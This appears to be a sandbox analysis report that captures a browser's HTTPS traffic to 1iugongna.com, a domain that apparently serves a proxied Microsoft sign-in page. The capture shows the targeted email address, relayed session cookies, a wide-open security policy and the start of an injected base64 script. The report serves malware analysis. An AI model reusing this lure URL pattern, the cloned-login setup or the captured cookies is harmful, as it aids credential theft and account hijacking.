                                                                              2025-01-10 20:41:59 UTC1385INData Raw: 66 71 78 61 8a e5 b0 5e 29 97 d4 b6 d9 b6 d8 b2 4e cf 06 83 8f ce 33 c5 f4 3f 93 ab 0e 70 a0 62 ed 80 e4 d0 b5 d0 56 fa 11 51 f1 70 08 c4 35 fc 75 d8 03 2a d2 c7 97 76 2c 02 25 7d f0 a3 e4 ce 03 69 be 47 a1 67 b9 d9 92 c9 48 46 05 d3 36 86 a6 8c 7c 3d c7 c8 e0 04 e9 67 a9 d0 6f 2d 24 a5 f3 c7 10 cc 47 b2 1c 90 94 f8 15 5b d7 64 62 46 39 8c 5b 78 34 5a 2c 04 af 62 50 2d 6a 1b 6e c0 91 b2 18 37 ab 1c 88 b4 84 d1 a2 7d 17 71 48 73 18 68 d1 62 2a f0 52 e0 27 0c a3 e5 0f 6f b4 49 66 ed f3 ed 2d 4c 17 44 30 86 9b e9 d6 9b 5f 20 a5 53 c1 c3 4f 62 91 38 f3 64 b2 b1 cb 7b 65 2e a2 69 3f c0 55 1c 2f 5f e0 db c6 e3 e3 e3 06 52 c6 c6 3c 9a 0a 06 21 1a c1 dd 1c ca 97 e3 3c a7 dc d8 50 8c 9b b2 21 8c 94 7b 1f cf 71 57 43 c6 81 5b 72 47 32 72 88 07 83 8a dc 23 b7 fe 48
                                                                              Data Ascii: fqxa^)N3?pbVQp5u*v,%}iGgHF6|=go-$G[dbF9[x4Z,bP-jn7}qHshb*R'oIf-LD0_ SOb8d{e.i?U/_R<!<P!{qWC[rG2r#H
                                                                              2025-01-10 20:41:59 UTC7575INData Raw: 05 f8 97 ee 5d 31 0b a7 17 56 8d 24 25 02 4a 60 b7 86 81 b7 ad 24 f5 d2 3c 67 0d 38 21 d1 da e9 e8 2f 2f 2f 91 76 66 54 1d 35 34 eb f9 01 e6 38 94 7d 53 1b 9a c4 75 aa ae 24 0b d9 0f 39 65 e0 75 f7 1f c2 6f ff 6d af ee d2 d3 a5 64 57 b2 04 27 d2 ce 9e aa e3 94 88 dd 41 89 7e e4 df fb a0 03 b1 72 85 1b d5 71 6a fb fd 4e 2d 3f c5 c3 24 9c 19 ab d0 2e 6f 5f e3 cc c3 c3 ff b4 1f 2b 9a 89 67 62 fd 10 9e 72 cd 50 5b c1 ff bf 6d 0b 1e d3 f5 97 db 22 41 f9 3e b5 1c 09 ac 10 f5 cf 8a 4f 84 ce 1f 41 19 7d 65 0d b5 93 ee d2 e8 da 4b 8d 27 92 e3 4b e7 50 fb 5a 12 88 aa 61 80 0a e3 fb 60 86 95 97 c4 a1 92 c4 e1 65 a2 24 71 a8 4b 62 d3 ca a4 84 e3 55 0d f5 6c c8 0c de a0 06 72 c8 a5 5a 75 b8 b2 2c 2a 46 72 8a ec 38 e9 3d c0 02 4b 89 19 68 3f 50 ee cf 02 fa f1 6c 54 f3
                                                                              Data Ascii: ]1V$%J`$<g8!///vfT548}Su$9euomdW'A~rqjN-?$.o_+gbrP[m"A>OA}eK'KPZa`e$qKbUlrZu,*Fr8=Kh?PlT
                                                                              2025-01-10 20:41:59 UTC8809INData Raw: b7 b9 77 ef 6f db 48 d2 46 ff 3f 9f 82 c2 fa 67 03 21 04 4b 4e 32 93 80 46 f8 73 64 7b e2 4c 7c 59 4b 4e 32 23 6b b4 20 01 4a b0 28 80 03 80 b2 35 12 bf fb a9 a7 aa bb d1 b8 50 76 66 e7 9c f7 9d dd 58 20 d0 68 f4 b5 ba ae 4f d9 cf fc 3a f8 14 43 87 ce 8c 5d e8 a2 79 f3 39 cb fa 54 d4 18 08 f8 bd 54 11 0f 51 f0 0b d1 21 72 26 04 42 13 0a 66 12 85 cc 80 77 f4 df d8 e1 27 36 24 08 48 d0 51 1c 68 e9 4b 4c cc 44 11 79 68 de 44 37 5d 9a 0e e0 ab 2d dc 0b 35 6e e3 7f 6a ad 46 3e 16 fa a2 8f 2a 4d b4 15 89 34 04 48 ee ee a2 b0 76 ff a1 9a db 47 39 13 f8 ad 14 f7 8d 1e 3c ee f4 51 84 89 0f 5e c6 ca 83 47 c1 76 38 93 37 c7 47 27 fc 8c 8a bf 8e 3a 14 c8 4d 87 04 6a 98 ad e9 2d 8f 03 09 23 54 20 57 34 17 f4 3d 3c 69 91 2a 05 8a 3c 52 a7 62 7d 1e d7 23 a0 76 57 a3 65
                                                                              Data Ascii: woHF?g!KN2Fsd{L|YKN2#k J(5PvfX hO:C]y9TTQ!r&Bfw'6$HQhKLDyhD7]-5njF>*M4HvG9<Q^Gv87G':Mj-#T W4=<i*<Rb}#vWe
                                                                              2025-01-10 20:41:59 UTC16384INData Raw: f2 fb 53 ee 81 75 50 e6 42 b8 d4 e8 98 fb ad e1 71 79 89 b2 f7 cd 46 65 5f 72 44 eb da 1c 76 93 2e 13 a0 f7 a9 9c fb fa 57 9f 59 c8 aa b7 0d c5 50 84 a2 5f aa d9 f7 4e 87 0e f4 cb 2a da 2c 5c a5 a3 88 80 67 33 3a 62 de b3 1f 24 49 14 df c5 98 c8 94 97 3d 6f 3b 96 84 11 81 a2 93 98 0d 7a 97 95 d0 53 0c 78 97 f9 ad 78 20 49 21 5a 44 ae 28 77 fe 12 bb e5 20 68 1f 54 fa 75 cb e2 a4 c0 76 fa 6f 68 5b e4 95 05 ff 2c 5a 76 54 22 39 23 87 0d fa 70 f1 05 fd 92 7c 92 1c 9c 03 c7 e1 b6 40 e2 31 95 e5 36 20 f5 70 13 32 ff 85 92 a0 03 bb 06 23 eb 14 6c e2 88 ca 26 a4 fe 06 37 c2 9b cd 66 73 87 13 e3 80 71 5b f3 4d d6 e9 c5 1e e3 b0 31 d7 26 c6 d2 d9 c5 67 4d 02 28 50 37 b5 07 14 41 3a a1 6d e9 d0 e1 76 7b fb dd 0f 3a e4 38 d5 44 0f 14 cf f0 4b fa 78 b3 d4 13 46 45 aa
                                                                              Data Ascii: SuPBqyFe_rDv.WYP_N*,\g3:b$I=o;zSxx I!ZD(w hTuvoh[,ZvT"9#p|@16 p2#l&7fsq[M1&gM(P7A:mv{:8DKxFE
                                                                              2025-01-10 20:41:59 UTC788INData Raw: dc 40 09 71 b9 86 c1 e4 0e 8c bc f3 a5 75 21 bd 0f 1d 36 2d ec 9a 6b 49 2e a0 c8 c2 60 ea c1 82 58 87 8c 58 07 24 91 91 cc 11 f0 1f 28 c4 35 cb 22 ea 51 26 b7 ec 2d 09 b8 17 dc d3 ce 6c fd 9c 26 4e 9f 38 f3 36 c6 f9 55 60 39 7b 63 07 d6 50 37 e3 1f 9a 0c b1 03 e4 38 72 46 ae b2 96 da a6 c2 d8 43 a4 31 08 8b fe ba ed 6d 37 d0 86 57 4f 1c 41 fd 06 3b cb 25 e3 45 ca 4a 23 46 ef c0 87 6e 9d 71 a1 dc a3 e3 e9 80 bf 71 fb fb 1e bb 9a e1 4c 1f aa b3 f6 54 eb a9 d2 da f8 a5 a4 1c 48 ac 3d a4 92 ed fc e5 be f2 ea 02 7f a9 18 4b 60 3c a8 ed 33 e8 65 a5 0d 4c 0a 8d 99 78 4f 24 b1 cf 89 cf 2c 7b dc a5 fe d0 90 3c db 03 f9 6f e7 42 c7 1b 85 45 0d f8 59 36 ec 54 af 5e dd c6 79 e5 ae 51 e8 28 53 58 9f 4b d1 f3 37 d4 d2 dd 7c 52 75 8e 2a eb e3 5a 1b 46 0d e2 43 ab b2 89
                                                                              Data Ascii: @qu!6-kI.`XX$(5"Q&-l&N86U`9{cP78rFC1m7WOA;%EJ#FnqqLTH=K`<3eLxO$,{<oBEY6T^yQ(SXK7|Ru*ZFC


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.549863207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:00 UTC1375OUTGET /?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: document
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; fpc=AqmpK8D-cVJBmJZccveAQWM; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEIDY3wnU9tTHnxzNOpcNEc6oA8uwkN1wMKNWOdDoKhPkBEVBDfJwaaemIv2GkwD_DtB4mZDdXzLLA13XDlOvNA3B5upDzmzX3KvAir5ucCusO1wnhqM7exacuQzsou7dTWYxlYXQr8F9o4CFBHxembmeGbxutE_PxLw4v-t7Hd3AgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                                              2025-01-10 20:42:01 UTC3335INHTTP/1.1 200 OK
                                                                              Cache-Control: no-store, no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Expires: -1
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                              Link: <https://aadcdn.msauth.net>; rel=preconnect; crossorigin,<https://aadcdn.msauth.net>; rel=dns-prefetch,<https://aadcdn.msftauth.net>; rel=dns-prefetch
                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                              x-ms-request-id: d7d0eec4-e7d3-4efa-b34c-bd2b6ee84600
                                                                              x-ms-ests-server: 2.1.19683.6 - NCUS ProdSlices
                                                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                              x-ms-srs: 1.P
                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                              Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-kR6_TIS0mRh-lyW5XmCMEw' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; img-src 'self' data: https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                                              Set-Cookie: buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; expires=Sun, 09-Feb-2025 20:42:00 GMT; path=/; secure; HttpOnly; SameSite=None
                                                                              Set-Cookie: esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; domain=1iugongna.com; path=/; secure; HttpOnly; SameSite=None
                                                                              Set-Cookie: esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; domain=1iugongna.com; path=/; secure; HttpOnly; SameSite=None
                                                                              Set-Cookie: fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; expires=Sun, 09-Feb-2025 20:42:00 GMT; path=/; secure; HttpOnly; SameSite=None
                                                                              Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                                              Date: Fri, 10 Jan 2025 20:42:00 GMT
                                                                              Connection: close
                                                                              content-length: 40965
                                                                              Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                                              2025-01-10 20:42:01 UTC13049INData Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64
                                                                              Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html dir="ltr" class="" lang="en"><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xd
                                                                              2025-01-10 20:42:01 UTC16384INData Raw: 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 2e 6f 72 67 69 64 2e 63 6f 6d 22 2c 22 75 72 6c 43 42 50 61 72 74 6e 65 72 50 72 65 6c 6f 61 64 22 3a 22 68 74 74 70 73 3a 2f 2f 70 6f 72 74 61 6c 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 2f 50 72 65 66 65 74 63 68 2f 50 72 65 66 65 74 63 68 2e 61 73 70 78 22 2c 22 75 72 6c 44 65 76 69 63 65 46 69 6e 67 65 72 70 72 69 6e 74 69 6e 67 22 3a 22 22 2c 22 75 72 6c 50 49 41 45 6e 64 41 75 74 68 22 3a 22 68 74 74 70 73 3a 2f 2f 31 69 75 67 6f 6e 67 6e 61 2e 63 6f 6d 2f 63 6f 6d 6d 6f 6e 2f 50 49 41 2f 45 6e 64 41 75 74 68 22 2c 22 66 43 42 53 68 6f 77 53 69 67 6e 55 70 22 3a 74 72 75 65 2c 22 66 4b 4d 53 49 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 69 4c 6f 67 69 6e 4d 6f 64 65 22 3a 31 32 31 2c
                                                                              Data Ascii: softonline.com.orgid.com","urlCBPartnerPreload":"https://portal.microsoftonline.com/Prefetch/Prefetch.aspx","urlDeviceFingerprinting":"","urlPIAEndAuth":"https://1iugongna.com/common/PIA/EndAuth","fCBShowSignUp":true,"fKMSIEnabled":false,"iLoginMode":121,
                                                                              2025-01-10 20:42:01 UTC11532INData Raw: 69 6c 75 72 65 7c 7c 72 2e 73 6c 52 65 70 6f 72 74 46 61 69 6c 75 72 65 7c 7c 21 31 7d 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 72 65 74 75 72 6e 28 65 28 29 2e 6c 6f 61 64 65 72 7c 7c 7b 7d 29 2e 72 65 64 69 72 65 63 74 54 6f 45 72 72 6f 72 50 61 67 65 4f 6e 4c 6f 61 64 46 61 69 6c 75 72 65 7c 7c 21 31 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 28 65 28 29 2e 6c 6f 61 64 65 72 7c 7c 7b 7d 29 2e 6c 6f 67 42 79 54 68 72 6f 77 69 6e 67 7c 7c 21 31 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 69 66 28 21 74 28 29 26 26 21 6e 28 29 29 7b 72 65 74 75 72 6e 21 31 7d 76 61 72 20 72 3d 65 2e 73 72 63 7c 7c 65 2e 68 72 65 66 7c 7c 22 22 3b 69 66 28 21 72 29 7b 72 65 74 75 72 6e 21 30 7d 69 66 28 6f 28 72 29 29 7b 76 61 72 20 69 2c 61 2c 73 3b 74 72
                                                                              Data Ascii: ilure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;tr


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.549864207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:00 UTC1227OUTGET /favicon.ico HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; fpc=AqmpK8D-cVJBmJZccveAQWM; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEIDY3wnU9tTHnxzNOpcNEc6oA8uwkN1wMKNWOdDoKhPkBEVBDfJwaaemIv2GkwD_DtB4mZDdXzLLA13XDlOvNA3B5upDzmzX3KvAir5ucCusO1wnhqM7exacuQzsou7dTWYxlYXQr8F9o4CFBHxembmeGbxutE_PxLw4v-t7Hd3AgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              33192.168.2.549865207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:00 UTC989OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; fpc=AqmpK8D-cVJBmJZccveAQWM; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEIDY3wnU9tTHnxzNOpcNEc6oA8uwkN1wMKNWOdDoKhPkBEVBDfJwaaemIv2GkwD_DtB4mZDdXzLLA13XDlOvNA3B5upDzmzX3KvAir5ucCusO1wnhqM7exacuQzsou7dTWYxlYXQr8F9o4CFBHxembmeGbxutE_PxLw4v-t7Hd3AgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
                                                                              2025-01-10 20:42:00 UTC1385INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:00 GMT
                                                                              Content-Type: application/x-javascript
                                                                              content-length: 142536
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Thu, 12 Dec 2024 21:33:52 GMT
                                                                              ETag: 0x8DD1AF4AC8A4BB0
                                                                              x-ms-request-id: 197b9ffd-001e-0068-6b04-629a6b000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204200Z-1698bcdb8c799mkthC1BL1dt1n00000005y0000000014x0d
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                                              2025-01-10 20:42:00 UTC14999INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a d2 dd cc 00 61 08 cc cc 2e b0 5c 4e ac 80 bb 83 9d b5 1d 68 06 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 e1 79 ef ec bc 32 f8 58 39 ff 7c 78 76 50 39 85 b7 7f 54 4e 06 e7 87 fb fd 1f af 07 3f 8a ff 9f df f9 71 65 e2 4f 45 05 7e 47 6e 2c bc 4a 18 54 c2 a8 e2 07 e3 30 9a 85 91 9b 88 b8 72 0f 7f 23 df 9d 56 26 51 78 5f 49 ee 44 65 16 85 5f c4 38 89 2b 53 3f 4e a0 d0 48 4c c3 c7 4a 15 aa 8b bc ca a9 1b 25 4f 95 c3 53 b3 0e f5 0b a8 cd bf f5 03 28 3d 0e 67 4f f0 7c 97 54 82 30 f1 c7 a2 e2 06 1e d5 36 85 97 20 16 95 79 e0 89 a8 f2 78 e7 8f ef 2a c7 fe 38 0a e3 70 92 54 22 31 16
                                                                              Data Ascii: m[80OL;wa.\Nhr~=,JUT~l?y2X9|xvP9TN?qeOE~Gn,JT0r#V&Qx_IDe_8+S?NHLJ%OS(=gO|T06 yx*8pT"1
                                                                              2025-01-10 20:42:00 UTC1385INData Raw: 66 71 78 61 8a e5 b0 5e 29 97 d4 b6 d9 b6 d8 b2 4e cf 06 83 8f ce 33 c5 f4 3f 93 ab 0e 70 a0 62 ed 80 e4 d0 b5 d0 56 fa 11 51 f1 70 08 c4 35 fc 75 d8 03 2a d2 c7 97 76 2c 02 25 7d f0 a3 e4 ce 03 69 be 47 a1 67 b9 d9 92 c9 48 46 05 d3 36 86 a6 8c 7c 3d c7 c8 e0 04 e9 67 a9 d0 6f 2d 24 a5 f3 c7 10 cc 47 b2 1c 90 94 f8 15 5b d7 64 62 46 39 8c 5b 78 34 5a 2c 04 af 62 50 2d 6a 1b 6e c0 91 b2 18 37 ab 1c 88 b4 84 d1 a2 7d 17 71 48 73 18 68 d1 62 2a f0 52 e0 27 0c a3 e5 0f 6f b4 49 66 ed f3 ed 2d 4c 17 44 30 86 9b e9 d6 9b 5f 20 a5 53 c1 c3 4f 62 91 38 f3 64 b2 b1 cb 7b 65 2e a2 69 3f c0 55 1c 2f 5f e0 db c6 e3 e3 e3 06 52 c6 c6 3c 9a 0a 06 21 1a c1 dd 1c ca 97 e3 3c a7 dc d8 50 8c 9b b2 21 8c 94 7b 1f cf 71 57 43 c6 81 5b 72 47 32 72 88 07 83 8a dc 23 b7 fe 48
                                                                              Data Ascii: fqxa^)N3?pbVQp5u*v,%}iGgHF6|=go-$G[dbF9[x4Z,bP-jn7}qHshb*R'oIf-LD0_ SOb8d{e.i?U/_R<!<P!{qWC[rG2r#H
                                                                              2025-01-10 20:42:00 UTC7575INData Raw: 05 f8 97 ee 5d 31 0b a7 17 56 8d 24 25 02 4a 60 b7 86 81 b7 ad 24 f5 d2 3c 67 0d 38 21 d1 da e9 e8 2f 2f 2f 91 76 66 54 1d 35 34 eb f9 01 e6 38 94 7d 53 1b 9a c4 75 aa ae 24 0b d9 0f 39 65 e0 75 f7 1f c2 6f ff 6d af ee d2 d3 a5 64 57 b2 04 27 d2 ce 9e aa e3 94 88 dd 41 89 7e e4 df fb a0 03 b1 72 85 1b d5 71 6a fb fd 4e 2d 3f c5 c3 24 9c 19 ab d0 2e 6f 5f e3 cc c3 c3 ff b4 1f 2b 9a 89 67 62 fd 10 9e 72 cd 50 5b c1 ff bf 6d 0b 1e d3 f5 97 db 22 41 f9 3e b5 1c 09 ac 10 f5 cf 8a 4f 84 ce 1f 41 19 7d 65 0d b5 93 ee d2 e8 da 4b 8d 27 92 e3 4b e7 50 fb 5a 12 88 aa 61 80 0a e3 fb 60 86 95 97 c4 a1 92 c4 e1 65 a2 24 71 a8 4b 62 d3 ca a4 84 e3 55 0d f5 6c c8 0c de a0 06 72 c8 a5 5a 75 b8 b2 2c 2a 46 72 8a ec 38 e9 3d c0 02 4b 89 19 68 3f 50 ee cf 02 fa f1 6c 54 f3
                                                                              Data Ascii: ]1V$%J`$<g8!///vfT548}Su$9euomdW'A~rqjN-?$.o_+gbrP[m"A>OA}eK'KPZa`e$qKbUlrZu,*Fr8=Kh?PlT
